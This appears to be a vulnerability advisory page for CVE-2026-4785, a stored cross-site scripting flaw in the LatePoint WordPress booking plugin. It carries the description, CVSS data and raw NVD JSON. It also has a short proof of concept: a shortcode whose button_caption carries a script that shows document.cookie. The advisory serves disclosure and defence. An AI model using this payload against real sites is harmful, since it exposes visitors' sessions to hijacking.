Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-4785 CVSS 6.4 MEDIUM

CVE-2026-4785

Published: 2026-04-08 05:16:07
Last Modified: 2026-04-27 19:04:23
Source: [email protected]

Description

The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_caption' parameter in the [latepoint_resources] shortcode in versions up to and including 5.3.0. This is due to insufficient output escaping when the 'items' parameter is set to 'bundles'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LatePoint <= 5.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-4785 Stored XSS --> <!-- 1. Log in as a Contributor user on a WordPress site with LatePoint <= 5.3.0 installed --> <!-- 2. Create a new Post or Page --> <!-- 3. Insert the following shortcode into the content --> [latepoint_resources items="bundles" button_caption="<script>alert(document.cookie);</script>"] <!-- 4. Publish/Submit the post --> <!-- 5. Visit the post page as a different user (e.g., Admin or Subscriber) --> <!-- 6. The JavaScript alert will trigger, demonstrating the XSS execution -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4785", "sourceIdentifier": "[email protected]", "published": "2026-04-08T05:16:06.997", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_caption' parameter in the [latepoint_resources] shortcode in versions up to and including 5.3.0. This is due to insufficient output escaping when the 'items' parameter is set to 'bundles'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.2.10/lib/helpers/shortcodes_helper.php#L272", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.2.10/lib/helpers/shortcodes_helper.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/shortcodes_helper.php#L272", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/shortcodes_helper.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3491516/latepoint", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/55c5c094-69c0-4e2a-be0c-fab6f1039309?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.